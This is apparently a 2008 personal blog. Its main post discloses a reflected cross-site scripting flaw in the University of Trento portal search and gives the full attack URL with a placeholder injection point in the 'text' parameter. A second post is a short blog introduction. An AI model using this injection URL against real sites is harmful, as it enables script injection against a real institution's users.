Too Cool for Internet Explorer

Wednesday, 8 October 2008

unitn.it search-field XSS vulnerability

Playing around with Firebug and HackBar, I discovered a cross-site scripting vulnerability in the University of Trento home page. Very simple but effective.

The exploit looks like this:


http://portale.unitn.it/scienze/search.do
?action_to_do=search_matching_values
&all=all
&cerca=Cerca
&channelId=-12827
&fast_search_radio=obj-search-quick-radio-unitn
&hidden_flag=hidden_flag
&page=/jsp/commonresultLucene.jsp
&pageToCall=show_all_people
&schInto=portal
&schOrder=orderRel
&schType=schAllWord
&search=
&text="<p/><_INJECTION_GOES_HERE_>


JavaScript injection works without restrictions, and HTML injection of course too. So I built a simple exploit in honor of my friend Maurizio Grasso; take a look at it:

http://portale.unitn.it/scienze

I encourage all of you to install the "NoScript" plugin for Firefox, which blocks such an attack very easily.

Tuesday, 7 October 2008

Finally I got a blog

Hi all,
finally I put a personal blog online. I don't know yet what kind of information I will put there, but knowing that I'm an informatics enthusiast will give you some idea ;-)

Let us see how many times I will spend my limited free time to write on this blog...

Important note: Sorry for my poor English... I hope that it will be better in the near future :-P